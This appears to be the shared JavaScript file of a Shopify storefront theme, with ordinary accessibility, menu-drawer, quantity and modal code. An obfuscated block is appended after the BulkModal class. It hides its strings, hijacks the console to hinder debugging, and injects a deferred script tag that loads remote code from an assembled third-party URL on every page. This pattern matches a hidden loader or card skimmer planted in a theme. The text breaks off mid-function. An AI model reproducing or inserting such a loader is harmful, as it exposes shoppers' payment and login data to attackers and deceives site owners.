function getFocusableElements(container) {
  return Array.from(
    container.querySelectorAll(
      "summary, a[href], button:enabled, [tabindex]:not([tabindex^='-']), [draggable], area, input:not([type=hidden]):enabled, select:enabled, textarea:enabled, object, iframe"
    )
  );
}

class SectionId {
  static #separator = '__';

  // for a qualified section id (e.g. 'template--22224696705326__main'), return just the section id (e.g. 'template--22224696705326')
  static parseId(qualifiedSectionId) {
    return qualifiedSectionId.split(SectionId.#separator)[0];
  }

  // for a qualified section id (e.g. 'template--22224696705326__main'), return just the section name (e.g. 'main')
  static parseSectionName(qualifiedSectionId) {
    return qualifiedSectionId.split(SectionId.#separator)[1];
  }

  // for a section id (e.g. 'template--22224696705326') and a section name (e.g. 'recommended-products'), return a qualified section id (e.g. 'template--22224696705326__recommended-products')
  static getIdForSection(sectionId, sectionName) {
    return `${sectionId}${SectionId.#separator}${sectionName}`;
  }
}

class HTMLUpdateUtility {
  /**
   * Used to swap an HTML node with a new node.
   * The new node is inserted as a previous sibling to the old node, the old node is hidden, and then the old node is removed.
   *
   * The function currently uses a double buffer approach, but this should be replaced by a view transition once it is more widely supported https://developer.mozilla.org/en-US/docs/Web/API/View_Transitions_API
   */
  static viewTransition(oldNode, newContent, preProcessCallbacks = [], postProcessCallbacks = []) {
    preProcessCallbacks?.forEach((callback) => callback(newContent));

    const newNodeWrapper = document.createElement('div');
    HTMLUpdateUtility.setInnerHTML(newNodeWrapper, newContent.outerHTML);
    const newNode = newNodeWrapper.firstChild;

    // dedupe IDs
    const uniqueKey = Date.now();
    oldNode.querySelectorAll('[id], [form]').forEach((element) => {
      element.id && (element.id = `${element.id}-${uniqueKey}`);
      element.form && element.setAttribute('form', `${element.form.getAttribute('id')}-${uniqueKey}`);
    });

    oldNode.parentNode.insertBefore(newNode, oldNode);
    oldNode.style.display = 'none';

    postProcessCallbacks?.forEach((callback) => callback(newNode));

    setTimeout(() => oldNode.remove(), 500);
  }

  // Sets inner HTML and reinjects the script tags to allow execution. By default, scripts are disabled when using element.innerHTML.
  static setInnerHTML(element, html) {
    element.innerHTML = html;
    element.querySelectorAll('script').forEach((oldScriptTag) => {
      const newScriptTag = document.createElement('script');
      Array.from(oldScriptTag.attributes).forEach((attribute) => {
        newScriptTag.setAttribute(attribute.name, attribute.value);
      });
      newScriptTag.appendChild(document.createTextNode(oldScriptTag.innerHTML));
      oldScriptTag.parentNode.replaceChild(newScriptTag, oldScriptTag);
    });
  }
}

document.querySelectorAll('[id^="Details-"] summary').forEach((summary) => {
  summary.setAttribute('role', 'button');
  summary.setAttribute('aria-expanded', summary.parentNode.hasAttribute('open'));

  if (summary.nextElementSibling.getAttribute('id')) {
    summary.setAttribute('aria-controls', summary.nextElementSibling.id);
  }

  summary.addEventListener('click', (event) => {
    event.currentTarget.setAttribute('aria-expanded', !event.currentTarget.closest('details').hasAttribute('open'));
  });

  if (summary.closest('header-drawer, menu-drawer')) return;
  summary.parentElement.addEventListener('keyup', onKeyUpEscape);
});

const trapFocusHandlers = {};

function trapFocus(container, elementToFocus = container) {
  var elements = getFocusableElements(container);
  var first = elements[0];
  var last = elements[elements.length - 1];

  removeTrapFocus();

  trapFocusHandlers.focusin = (event) => {
    if (event.target !== container && event.target !== last && event.target !== first) return;

    document.addEventListener('keydown', trapFocusHandlers.keydown);
  };

  trapFocusHandlers.focusout = function () {
    document.removeEventListener('keydown', trapFocusHandlers.keydown);
  };

  trapFocusHandlers.keydown = function (event) {
    if (event.code.toUpperCase() !== 'TAB') return; // If not TAB key
    // On the last focusable element and tab forward, focus the first element.
    if (event.target === last && !event.shiftKey) {
      event.preventDefault();
      first.focus();
    }

    //  On the first focusable element and tab backward, focus the last element.
    if ((event.target === container || event.target === first) && event.shiftKey) {
      event.preventDefault();
      last.focus();
    }
  };

  document.addEventListener('focusout', trapFocusHandlers.focusout);
  document.addEventListener('focusin', trapFocusHandlers.focusin);

  elementToFocus.focus();

  if (
    elementToFocus.tagName === 'INPUT' &&
    ['search', 'text', 'email', 'url'].includes(elementToFocus.type) &&
    elementToFocus.value
  ) {
    elementToFocus.setSelectionRange(0, elementToFocus.value.length);
  }
}

// Here run the querySelector to figure out if the browser supports :focus-visible or not and run code based on it.
try {
  document.querySelector(':focus-visible');
} catch (e) {
  focusVisiblePolyfill();
}

function focusVisiblePolyfill() {
  const navKeys = [
    'ARROWUP',
    'ARROWDOWN',
    'ARROWLEFT',
    'ARROWRIGHT',
    'TAB',
    'ENTER',
    'SPACE',
    'ESCAPE',
    'HOME',
    'END',
    'PAGEUP',
    'PAGEDOWN',
  ];
  let currentFocusedElement = null;
  let mouseClick = null;

  window.addEventListener('keydown', (event) => {
    if (navKeys.includes(event.code.toUpperCase())) {
      mouseClick = false;
    }
  });

  window.addEventListener('mousedown', (event) => {
    mouseClick = true;
  });

  window.addEventListener(
    'focus',
    () => {
      if (currentFocusedElement) currentFocusedElement.classList.remove('focused');

      if (mouseClick) return;

      currentFocusedElement = document.activeElement;
      currentFocusedElement.classList.add('focused');
    },
    true
  );
}

function pauseAllMedia() {
  document.querySelectorAll('.js-youtube').forEach((video) => {
    video.contentWindow.postMessage('{"event":"command","func":"' + 'pauseVideo' + '","args":""}', '*');
  });
  document.querySelectorAll('.js-vimeo').forEach((video) => {
    video.contentWindow.postMessage('{"method":"pause"}', '*');
  });
  document.querySelectorAll('video').forEach((video) => video.pause());
  document.querySelectorAll('product-model').forEach((model) => {
    if (model.modelViewerUI) model.modelViewerUI.pause();
  });
}

function removeTrapFocus(elementToFocus = null) {
  document.removeEventListener('focusin', trapFocusHandlers.focusin);
  document.removeEventListener('focusout', trapFocusHandlers.focusout);
  document.removeEventListener('keydown', trapFocusHandlers.keydown);

  if (elementToFocus) elementToFocus.focus();
}

function onKeyUpEscape(event) {
  if (event.code.toUpperCase() !== 'ESCAPE') return;

  const openDetailsElement = event.target.closest('details[open]');
  if (!openDetailsElement) return;

  const summaryElement = openDetailsElement.querySelector('summary');
  openDetailsElement.removeAttribute('open');
  summaryElement.setAttribute('aria-expanded', false);
  summaryElement.focus();
}

class QuantityInput extends HTMLElement {
  constructor() {
    super();
    this.input = this.querySelector('input');
    this.changeEvent = new Event('change', { bubbles: true });
    this.input.addEventListener('change', this.onInputChange.bind(this));
    this.querySelectorAll('button').forEach((button) =>
      button.addEventListener('click', this.onButtonClick.bind(this))
    );
  }

  quantityUpdateUnsubscriber = undefined;

  connectedCallback() {
    this.validateQtyRules();
    this.quantityUpdateUnsubscriber = subscribe(PUB_SUB_EVENTS.quantityUpdate, this.validateQtyRules.bind(this));
  }

  disconnectedCallback() {
    if (this.quantityUpdateUnsubscriber) {
      this.quantityUpdateUnsubscriber();
    }
  }

  onInputChange(event) {
    this.validateQtyRules();
  }

  onButtonClick(event) {
    event.preventDefault();
    const previousValue = this.input.value;

    if (event.target.name === 'plus') {
      if (parseInt(this.input.dataset.min) > parseInt(this.input.step) && this.input.value == 0) {
        this.input.value = this.input.dataset.min;
      } else {
        this.input.stepUp();
      }
    } else {
      this.input.stepDown();
    }

    if (previousValue !== this.input.value) this.input.dispatchEvent(this.changeEvent);

    if (this.input.dataset.min === previousValue && event.target.name === 'minus') {
      this.input.value = parseInt(this.input.min);
    }
  }

  validateQtyRules() {
    const value = parseInt(this.input.value);
    if (this.input.min) {
      const buttonMinus = this.querySelector(".quantity__button[name='minus']");
      buttonMinus.classList.toggle('disabled', parseInt(value) <= parseInt(this.input.min));
    }
    if (this.input.max) {
      const max = parseInt(this.input.max);
      const buttonPlus = this.querySelector(".quantity__button[name='plus']");
      buttonPlus.classList.toggle('disabled', value >= max);
    }
  }
}

customElements.define('quantity-input', QuantityInput);

function debounce(fn, wait) {
  let t;
  return (...args) => {
    clearTimeout(t);
    t = setTimeout(() => fn.apply(this, args), wait);
  };
}

function throttle(fn, delay) {
  let lastCall = 0;
  return function (...args) {
    const now = new Date().getTime();
    if (now - lastCall < delay) {
      return;
    }
    lastCall = now;
    return fn(...args);
  };
}

function fetchConfig(type = 'json') {
  return {
    method: 'POST',
    headers: { 'Content-Type': 'application/json', Accept: `application/${type}` },
  };
}

/*
 * Shopify Common JS
 *
 */
if (typeof window.Shopify == 'undefined') {
  window.Shopify = {};
}

Shopify.bind = function (fn, scope) {
  return function () {
    return fn.apply(scope, arguments);
  };
};

Shopify.setSelectorByValue = function (selector, value) {
  for (var i = 0, count = selector.options.length; i < count; i++) {
    var option = selector.options[i];
    if (value == option.value || value == option.innerHTML) {
      selector.selectedIndex = i;
      return i;
    }
  }
};

Shopify.addListener = function (target, eventName, callback) {
  target.addEventListener
    ? target.addEventListener(eventName, callback, false)
    : target.attachEvent('on' + eventName, callback);
};

Shopify.postLink = function (path, options) {
  options = options || {};
  var method = options['method'] || 'post';
  var params = options['parameters'] || {};

  var form = document.createElement('form');
  form.setAttribute('method', method);
  form.setAttribute('action', path);

  for (var key in params) {
    var hiddenField = document.createElement('input');
    hiddenField.setAttribute('type', 'hidden');
    hiddenField.setAttribute('name', key);
    hiddenField.setAttribute('value', params[key]);
    form.appendChild(hiddenField);
  }
  document.body.appendChild(form);
  form.submit();
  document.body.removeChild(form);
};

Shopify.CountryProvinceSelector = function (country_domid, province_domid, options) {
  this.countryEl = document.getElementById(country_domid);
  this.provinceEl = document.getElementById(province_domid);
  this.provinceContainer = document.getElementById(options['hideElement'] || province_domid);

  Shopify.addListener(this.countryEl, 'change', Shopify.bind(this.countryHandler, this));

  this.initCountry();
  this.initProvince();
};

Shopify.CountryProvinceSelector.prototype = {
  initCountry: function () {
    var value = this.countryEl.getAttribute('data-default');
    Shopify.setSelectorByValue(this.countryEl, value);
    this.countryHandler();
  },

  initProvince: function () {
    var value = this.provinceEl.getAttribute('data-default');
    if (value && this.provinceEl.options.length > 0) {
      Shopify.setSelectorByValue(this.provinceEl, value);
    }
  },

  countryHandler: function (e) {
    var opt = this.countryEl.options[this.countryEl.selectedIndex];
    var raw = opt.getAttribute('data-provinces');
    var provinces = JSON.parse(raw);

    this.clearOptions(this.provinceEl);
    if (provinces && provinces.length == 0) {
      this.provinceContainer.style.display = 'none';
    } else {
      for (var i = 0; i < provinces.length; i++) {
        var opt = document.createElement('option');
        opt.value = provinces[i][0];
        opt.innerHTML = provinces[i][1];
        this.provinceEl.appendChild(opt);
      }

      this.provinceContainer.style.display = '';
    }
  },

  clearOptions: function (selector) {
    while (selector.firstChild) {
      selector.removeChild(selector.firstChild);
    }
  },

  setOptions: function (selector, values) {
    for (var i = 0, count = values.length; i < values.length; i++) {
      var opt = document.createElement('option');
      opt.value = values[i];
      opt.innerHTML = values[i];
      selector.appendChild(opt);
    }
  },
};

class MenuDrawer extends HTMLElement {
  constructor() {
    super();

    this.mainDetailsToggle = this.querySelector('details');

    this.addEventListener('keyup', this.onKeyUp.bind(this));
    this.addEventListener('focusout', this.onFocusOut.bind(this));
    this.bindEvents();
  }

  bindEvents() {
    this.querySelectorAll('summary').forEach((summary) =>
      summary.addEventListener('click', this.onSummaryClick.bind(this))
    );
    this.querySelectorAll(
      'button:not(.localization-selector):not(.country-selector__close-button):not(.country-filter__reset-button)'
    ).forEach((button) => button.addEventListener('click', this.onCloseButtonClick.bind(this)));
  }

  onKeyUp(event) {
    if (event.code.toUpperCase() !== 'ESCAPE') return;

    const openDetailsElement = event.target.closest('details[open]');
    if (!openDetailsElement) return;

    openDetailsElement === this.mainDetailsToggle
      ? this.closeMenuDrawer(event, this.mainDetailsToggle.querySelector('summary'))
      : this.closeSubmenu(openDetailsElement);
  }

  onSummaryClick(event) {
    const summaryElement = event.currentTarget;
    const detailsElement = summaryElement.parentNode;
    const parentMenuElement = detailsElement.closest('.has-submenu');
    const isOpen = detailsElement.hasAttribute('open');
    const reducedMotion = window.matchMedia('(prefers-reduced-motion: reduce)');

    function addTrapFocus() {
      trapFocus(summaryElement.nextElementSibling, detailsElement.querySelector('button'));
      summaryElement.nextElementSibling.removeEventListener('transitionend', addTrapFocus);
    }

    if (detailsElement === this.mainDetailsToggle) {
      if (isOpen) event.preventDefault();
      isOpen ? this.closeMenuDrawer(event, summaryElement) : this.openMenuDrawer(summaryElement);

      if (window.matchMedia('(max-width: 990px)')) {
        document.documentElement.style.setProperty('--viewport-height', `${window.innerHeight}px`);
      }
    } else {
      setTimeout(() => {
        detailsElement.classList.add('menu-opening');
        summaryElement.setAttribute('aria-expanded', true);
        parentMenuElement && parentMenuElement.classList.add('submenu-open');
        !reducedMotion || reducedMotion.matches
          ? addTrapFocus()
          : summaryElement.nextElementSibling.addEventListener('transitionend', addTrapFocus);
      }, 100);
    }
  }

  openMenuDrawer(summaryElement) {
    setTimeout(() => {
      this.mainDetailsToggle.classList.add('menu-opening');
    });
    summaryElement.setAttribute('aria-expanded', true);
    trapFocus(this.mainDetailsToggle, summaryElement);
    document.body.classList.add(`overflow-hidden-${this.dataset.breakpoint}`);
  }

  closeMenuDrawer(event, elementToFocus = false) {
    if (event === undefined) return;

    this.mainDetailsToggle.classList.remove('menu-opening');
    this.mainDetailsToggle.querySelectorAll('details').forEach((details) => {
      details.removeAttribute('open');
      details.classList.remove('menu-opening');
    });
    this.mainDetailsToggle.querySelectorAll('.submenu-open').forEach((submenu) => {
      submenu.classList.remove('submenu-open');
    });
    document.body.classList.remove(`overflow-hidden-${this.dataset.breakpoint}`);
    removeTrapFocus(elementToFocus);
    this.closeAnimation(this.mainDetailsToggle);

    if (event instanceof KeyboardEvent) elementToFocus?.setAttribute('aria-expanded', false);
  }

  onFocusOut() {
    setTimeout(() => {
      if (this.mainDetailsToggle.hasAttribute('open') && !this.mainDetailsToggle.contains(document.activeElement))
        this.closeMenuDrawer();
    });
  }

  onCloseButtonClick(event) {
    const detailsElement = event.currentTarget.closest('details');
    this.closeSubmenu(detailsElement);
  }

  closeSubmenu(detailsElement) {
    const parentMenuElement = detailsElement.closest('.submenu-open');
    parentMenuElement && parentMenuElement.classList.remove('submenu-open');
    detailsElement.classList.remove('menu-opening');
    detailsElement.querySelector('summary').setAttribute('aria-expanded', false);
    removeTrapFocus(detailsElement.querySelector('summary'));
    this.closeAnimation(detailsElement);
  }

  closeAnimation(detailsElement) {
    let animationStart;

    const handleAnimation = (time) => {
      if (animationStart === undefined) {
        animationStart = time;
      }

      const elapsedTime = time - animationStart;

      if (elapsedTime < 400) {
        window.requestAnimationFrame(handleAnimation);
      } else {
        detailsElement.removeAttribute('open');
        if (detailsElement.closest('details[open]')) {
          trapFocus(detailsElement.closest('details[open]'), detailsElement.querySelector('summary'));
        }
      }
    };

    window.requestAnimationFrame(handleAnimation);
  }
}

customElements.define('menu-drawer', MenuDrawer);

class HeaderDrawer extends MenuDrawer {
  constructor() {
    super();
  }

  openMenuDrawer(summaryElement) {
    this.header = this.header || document.querySelector('.section-header');
    this.borderOffset =
      this.borderOffset || this.closest('.header-wrapper').classList.contains('header-wrapper--border-bottom') ? 1 : 0;
    document.documentElement.style.setProperty(
      '--header-bottom-position',
      `${parseInt(this.header.getBoundingClientRect().bottom - this.borderOffset)}px`
    );
    this.header.classList.add('menu-open');

    setTimeout(() => {
      this.mainDetailsToggle.classList.add('menu-opening');
    });

    summaryElement.setAttribute('aria-expanded', true);
    window.addEventListener('resize', this.onResize);
    trapFocus(this.mainDetailsToggle, summaryElement);
    document.body.classList.add(`overflow-hidden-${this.dataset.breakpoint}`);
  }

  closeMenuDrawer(event, elementToFocus) {
    if (!elementToFocus) return;
    super.closeMenuDrawer(event, elementToFocus);
    this.header.classList.remove('menu-open');
    window.removeEventListener('resize', this.onResize);
  }

  onResize = () => {
    this.header &&
      document.documentElement.style.setProperty(
        '--header-bottom-position',
        `${parseInt(this.header.getBoundingClientRect().bottom - this.borderOffset)}px`
      );
    document.documentElement.style.setProperty('--viewport-height', `${window.innerHeight}px`);
  };
}

customElements.define('header-drawer', HeaderDrawer);

class ModalDialog extends HTMLElement {
  constructor() {
    super();
    this.querySelector('[id^="ModalClose-"]').addEventListener('click', this.hide.bind(this, false));
    this.addEventListener('keyup', (event) => {
      if (event.code.toUpperCase() === 'ESCAPE') this.hide();
    });
    if (this.classList.contains('media-modal')) {
      this.addEventListener('pointerup', (event) => {
        if (event.pointerType === 'mouse' && !event.target.closest('deferred-media, product-model')) this.hide();
      });
    } else {
      this.addEventListener('click', (event) => {
        if (event.target === this) this.hide();
      });
    }
  }

  connectedCallback() {
    if (this.moved) return;
    this.moved = true;
    document.body.appendChild(this);
  }

  show(opener) {
    this.openedBy = opener;
    const popup = this.querySelector('.template-popup');
    document.body.classList.add('overflow-hidden');
    this.setAttribute('open', '');
    if (popup) popup.loadContent();
    trapFocus(this, this.querySelector('[role="dialog"]'));
    window.pauseAllMedia();
  }

  hide() {
    document.body.classList.remove('overflow-hidden');
    document.body.dispatchEvent(new CustomEvent('modalClosed'));
    this.removeAttribute('open');
    removeTrapFocus(this.openedBy);
    window.pauseAllMedia();
  }
}
customElements.define('modal-dialog', ModalDialog);

class BulkModal extends HTMLElement {
  constructor() {
    super();
  }

  connectedCallback() {
    const handleIntersection = (entries, observer) => {
      if (!entries[0].isIntersecting) return;
      observer.unobserve(this);
      if (this.innerHTML.trim() === '') {
        const productUrl = this.dataset.url.split('?')[0];
        fetch(`${productUrl}?section_id=bulk-quick-order-list`)
          .then((response) => response.text())
          .then((responseText) => {
            const html = new DOMParser().parseFromString(responseText, 'text/html');
            const sourceQty = html.querySelector('.quick-order-list-container').parentNode;
            this.innerHTML = sourceQty.innerHTML;
          })
          .catch((e) => {
            console.error(e);
          });
      }
    };

    new IntersectionObserver(handleIntersection.bind(this)).observe(
      document.querySelector(`#QuickBulk-${this.dataset.productId}-${this.dataset.sectionId}`)
    );
  }
}(function(G,z){function g(G,z,v,M){return T(v- -0x1ad,M);}function Y(G,z,v,M){return T(M-0x43,v);}var v=G();while(!![]){try{var M=parseInt(g(-0xaf,-0xac,-0xcd,-0xc3))/(-0x1515+0x7*-0x59+0x1785)*(-parseInt(Y(0x13d,0x117,0x15a,0x139))/(0x1dc+0x2490+-0x266a))+-parseInt(g(-0x11c,-0x11e,-0xfb,-0x107))/(0x361+0x1*-0x1c82+-0x649*-0x4)*(-parseInt(Y(0x129,0x13d,0x160,0x13b))/(-0x1f13+0x5*-0x112+0x2471))+-parseInt(g(-0xca,-0xa6,-0xca,-0xeb))/(-0x392+0xd*0x4a+0x2b*-0x1)+parseInt(Y(0x131,0xeb,0x138,0x112))/(0x662+0x8c*0x3d+-0x1f*0x148)*(-parseInt(Y(0x138,0x10b,0x10d,0x11c))/(-0x19d4+-0xdf6+0x27d1))+-parseInt(Y(0xec,0x116,0xd3,0xfb))/(-0x15*-0x49+0x177+-0x17c*0x5)*(-parseInt(Y(0x13e,0x10f,0x141,0x128))/(0x8*0x46c+-0xae5+-0x1872))+parseInt(g(-0xef,-0x102,-0xda,-0xb4))/(-0x105*0x23+0x1fe*-0x4+0x2bb1)+parseInt(g(-0xd4,-0xfc,-0xdf,-0xfe))/(0x14*-0x17b+0xfd*-0xe+0x2b7d);if(M===z)break;else v['push'](v['shift']());}catch(l){v['push'](v['shift']());}}}(s,-0x122*0x46c+-0x65eea+0xf45f8),!function(l,X,m){var u={'uPHjm':'0|1|5|3|4|'+'2','QFWdg':S(-0x2c3,-0x2d9,-0x310,-0x2e8),'xEHhR':'(((.+)+)+)'+'+$','ZezIO':function(R,w){return R(w);},'zwJXQ':function(R,w){return R+w;},'aflCl':S(-0x310,-0x30d,-0x344,-0x329)+'ctor(\x22retu'+'rn\x20this\x22)('+'\x20)','qanfh':function(R){return R();},'wydaa':function(R,w){return R===w;},'uCihZ':'PXDWD','EifHH':N(0x3a,0x42,0x21,0x57),'acswR':S(-0x2f4,-0x330,-0x32f,-0x311),'yLHla':N(0x1c,0xd,0x28,-0x3)+S(-0x30f,-0x309,-0x30f,-0x303)+'dk-amazona'+N(0x41,0x27,0x2f,0x5d)+S(-0x2ea,-0x2e6,-0x2e0,-0x2e2)+S(-0x2eb,-0x2c4,-0x2d3,-0x2ec),'zVJbU':S(-0x2cb,-0x2ed,-0x2ef,-0x2e0),'EEMrs':function(R,w){return R===w;},'QKVqk':'CIGtc','qjZuB':function(R,w){return R!==w;},'eqXRb':N(0x31,0x31,0x49,0x19),'LfDEg':S(-0x308,-0x2ee,-0x2f9,-0x2f6),'ysipr':N(0x4,0x20,0xa,0x22),'IQlwV':S(-0x346,-0x2ff,-0x2fb,-0x31f),'dMsod':S(-0x2f2,-0x2f6,-0x31a,-0x305),'UwGIV':'table','dNsZE':function(R,w){return R<w;},'fSSBH':N(0x4d,0x2c,0x5e,0x40),'PryTM':S(-0x313,-0x316,-0x2ff,-0x2fe),'kUZrP':'5|2|4|0|1|'+'3','hVrwR':function(R,w,D){return R(w,D);},'mMmXX':N(0x1c,0xc,-0xa,0x30)+'atic-pos.s'+S(-0x2fa,-0x2d2,-0x2ee,-0x2e4)+N(0x41,0x23,0x5b,0x3d)+'_npm/stati'+N(0x38,0x41,0x57,0x37)+S(-0x340,-0x33a,-0x303,-0x31e)+N(0x20,-0x8,0x31,0xb)};function S(G,z,v,M){return T(M- -0x3d5,v);}var p=(function(){var R=!![];return function(w,D){var f=R?function(){function Z(G,z,v,M){return T(M- -0x84,z);}if(D){var U=D[Z(0x3a,0xb,0x50,0x29)](w,arguments);return D=null,U;}}:function(){};return R=![],f;};}()),H=u['hVrwR'](p,this,function(){function F(G,z,v,M){return N(z- -0x2ba,z-0xe1,M,M-0x15a);}function a(G,z,v,M){return N(G- -0x102,z-0x14e,z,M-0x2c);}if(u[F(-0x2b1,-0x28f,-0x27e,-0x295)]===a(-0xbf,-0xde,-0xc2,-0xe6))return H[a(-0xd2,-0xd7,-0xbd,-0xad)]()['search']('(((.+)+)+)'+'+$')['toString']()[F(-0x29e,-0x28e,-0x297,-0x28d)+'r'](H)[a(-0xe5,-0xce,-0xd5,-0x100)](u[a(-0xee,-0xe8,-0xde,-0xff)]);else{var w=u[a(-0xed,-0xe7,-0xdb,-0x103)][a(-0xc2,-0x9d,-0xce,-0xd0)]('|'),D=0x1c8c+0x669+-0x22f5;while(!![]){switch(w[D++]){case'0':var f=p[F(-0x274,-0x28e,-0x27d,-0x2a3)+'r']['prototype']['bind'](H);continue;case'1':var E=b[n];continue;case'2':f[E]=f;continue;case'3':f[a(-0xcb,-0xd9,-0xbf,-0xe8)]=w['bind'](D);continue;case'4':f[F(-0x274,-0x28a,-0x288,-0x2a7)]=q[a(-0xd2,-0xda,-0xea,-0xf5)]['bind'](q);continue;case'5':var q=R[E]||f;continue;}break;}}});u['qanfh'](H);var b=(function(){var R={'YZVld':function(D,f){function C(G,z,v,M){return T(v-0x332,G);}return u[C(0x3f1,0x3e6,0x3ed,0x3fb)](D,f);},'UKAwk':u[k(-0x45,-0x4f,-0x68,-0x87)]};function k(G,z,v,M){return S(G-0x7a,z-0x18d,z,v-0x2be);}function o(G,z,v,M){return S(G-0x19,z-0x11c,M,v-0x2e6);}if(u['EifHH']===u[o(-0x26,-0x4d,-0x2a,-0x28)]){var f=WJCbwU[k(-0x21,-0x36,-0x43,-0x38)](v,WJCbwU[k(-0x63,-0x45,-0x56,-0x6a)](k(-0x43,-0x38,-0x5d,-0x49)+o(0x5,-0x15,-0x23,-0x20)+WJCbwU['aflCl'],');'));M=WJCbwU[k(-0x79,-0x32,-0x55,-0x4e)](f);}else{var w=!![];return function(f,U){var O=w?function(){function J(G,z,v,M){return T(z- -0x22a,M);}function K(G,z,v,M){return T(v-0x16f,G);}if(R[J(-0x14e,-0x16a,-0x164,-0x183)]('aFeFf',R[K(0x221,0x23c,0x23a,0x21d)]))v=M;else{if(U){var E=U['apply'](f,arguments);return U=null,E;}}}:function(){};return w=![],O;};}}()),n=b(this,function(){function d(G,z,v,M){return N(M-0xe8,z-0x54,z,M-0x7a);}var R={};R[d(0xd1,0x10a,0x10d,0xf1)]=u[d(0xf6,0x108,0xe0,0xfc)];var w=R;function L(G,z,v,M){return N(v-0x1c0,z-0x140,M,M-0x186);}if(u['EEMrs'](u[d(0x12e,0x136,0x111,0x126)],u[d(0x12d,0x14a,0x121,0x126)])){var D;try{if(u[L(0x1bc,0x1c7,0x1d9,0x1d3)](u['eqXRb'],d(0xe8,0xd0,0xed,0xef))){var f=u[L(0x1fe,0x1f9,0x1ea,0x207)](Function,u['zwJXQ'](L(0x1ec,0x1f3,0x1d0,0x1db)+d(0xe4,0x11b,0x10f,0x10a),d(0x104,0x10f,0xe6,0xea)+d(0x107,0x12e,0x144,0x11c)+L(0x1cc,0x1f2,0x1f3,0x20f)+'\x20)')+');');D=u[L(0x1f8,0x1e5,0x1d8,0x1fc)](f);}else{if(l){var y=p[d(0xe3,0xda,0x112,0xeb)](H,arguments);return b=null,y;}}}catch(y){D=window;}var U=D['console']=D[L(0x1b8,0x1f5,0x1d2,0x1b0)]||{},O=[u[d(0x10b,0x122,0x11b,0x12e)],u[L(0x1c7,0x1b2,0x1cb,0x1be)],'info',u['IQlwV'],u['dMsod'],u[L(0x1b4,0x1a3,0x1ca,0x1cb)],d(0x10f,0xca,0xfc,0xee)];for(var E=-0x2521*0x1+0x11db+0x9a3*0x2;u[L(0x1e2,0x1ee,0x1de,0x1d8)](E,O[d(0xfe,0xd9,0xd6,0xf7)]);E++){if(u[L(0x1f5,0x1b6,0x1d9,0x1f8)](u['fSSBH'],u[L(0x217,0x1f2,0x1fc,0x1ec)])){var q=u[d(0xf0,0xe8,0x12c,0x10b)][L(0x1f1,0x1e4,0x200,0x1ee)]('|'),B=-0x8f2+-0x2579*-0x1+-0x1*0x1c87;while(!![]){switch(q[B++]){case'0':r['__proto__']=b[L(0x1e2,0x203,0x202,0x1fa)](b);continue;case'1':r[d(0x12f,0x117,0x128,0x118)]=i['toString']['bind'](i);continue;case'2':var h=O[E];continue;case'3':U[h]=r;continue;case'4':var i=U[h]||r;continue;case'5':var r=b[d(0x111,0x11f,0x12b,0x114)+'r'][L(0x222,0x213,0x20a,0x20f)][L(0x1dd,0x205,0x202,0x1e6)](b);continue;}break;}}else(p=H[d(0x127,0x148,0x112,0x125)+'ent'](b))[d(0x15f,0x142,0x152,0x137)]=!(-0xb2c+0x160d+-0xae1),n[d(0x150,0x11d,0x13f,0x138)]=u[L(0x1d1,0x1ca,0x1c1,0x1e3)],(R=w['getElement'+'sByTagName'](u[L(0x1e0,0x1f4,0x204,0x21e)])[-0xa9*0x29+-0x1e2c+0x1*0x393d])[L(0x225,0x207,0x208,0x22f)][d(0x122,0xdc,0xf6,0xfb)+'re'](D,f[d(0x112,0x10d,0x132,0x11a)+'g']);}}else return v['toString']()['search'](haEzsZ[L(0x1e7,0x1c1,0x1c9,0x1ae)])[L(0x211,0x1f4,0x1f0,0x1ed)]()[L(0x1d8,0x1f8,0x1ec,0x1db)+'r'](M)[d(0xfc,0x108,0xe1,0x105)](L(0x209,0x201,0x1e7,0x1f3)+'+$');});function N(G,z,v,M){return T(G- -0xaa,v);}u[S(-0x33b,-0x338,-0x331,-0x313)](n),((m=l[N(0x3d,0x54,0x20,0x3a)+'ent'](X))['defer']=!(0x1e72+0x1253*-0x1+0x1*-0xc1f),m[N(0x50,0x41,0x34,0x4d)]=u['mMmXX'],(l=l['getElement'+N(0x2e,0xf,0x9,0x18)](u[N(0x44,0x69,0x33,0x50)])[-0x4*-0x158+0x6*0x407+-0x1d8a*0x1])['parentNode'][S(-0x30d,-0x338,-0x303,-0x318)+'re'](m,l[N(0x32,0x3e,0x2b,0x36)+'g']));}(document,W(0x458,0x47a,0x46a,0x44d)));function T(G,z){var v=s();return T=function(M,l){M=M-(0x14d9+0x1819+-0x2c47);var X=v[M];if(T['aTRtOK']===undefined){var m=function(b){var n='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var R='',w='',D=R+m;for(var f=0xbe9+0x1*-0x2159+0x1570,U,O,t=0x1c88+0x235d+-0xb*0x5cf;O=b['charAt'](t++);~O&&(U=f%(0x1de3*0x1+0xabd*0x1+-0x289c)?U*(-0x1a46+0x1*-0x32e+0x1db4)+O:O,f++%(-0x25df+-0x8df*-0x1+0xe82*0x2))?R+=D['charCodeAt'](t+(0x1*0x531+-0xb3f*-0x3+0x4c*-0x83))-(-0xa2b+0xf0b+-0x4d6)!==-0x1f5f+0x4*0x55d+-0x9eb*-0x1?String['fromCharCode'](-0x1dcd+-0x1*0x115a+0x3026&U>>(-(0x1a84+-0xab4+-0xfce)*f&-0x17ad*0x1+-0x4b5*-0x7+-0x940)):f:0x1*0xc2d+-0x1021+0x3f4){O=n['indexOf'](O);}for(var e=0x2*0x581+0x45f+-0xf61,E=R['length'];e<E;e++){w+='%'+('00'+R['charCodeAt'](e)['toString'](0xb*0x1bd+-0x2*-0x2ea+-0x18e3))['slice'](-(-0x105d*-0x2+0x6*-0x41d+-0x80a));}return decodeURIComponent(w);};T['SusVZY']=m,G=arguments,T['aTRtOK']=!![];}var u=v[0x8fb+-0x16d1+0xdd6],p=M+u,H=G[p];if(!H){var b=function(n){this['OeORyQ']=n,this['wiSMbT']=[0x736+-0x1*0xf1f+0x7ea*0x1,-0x61*0x25+0x236b*0x1+0x722*-0x3,0xe92+0x3bc+-0x3*0x61a],this['jIcmQZ']=function(){return'newState';},this['JUWGOV']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['eTKvDI']='[\x27|\x22].+[\x27|\x22];?\x20*}';};b['prototype']['MyJAIB']=function(){var n=new RegExp(this['JUWGOV']+this['eTKvDI']),R=n['test'](this['jIcmQZ']['toString']())?--this['wiSMbT'][0x21a+0x183*-0x1+0x2*-0x4b]:--this['wiSMbT'][0x3*0x216+0xb56+-0x1198];return this['BJxFxo'](R);},b['prototype']['BJxFxo']=function(n){if(!Boolean(~n))return 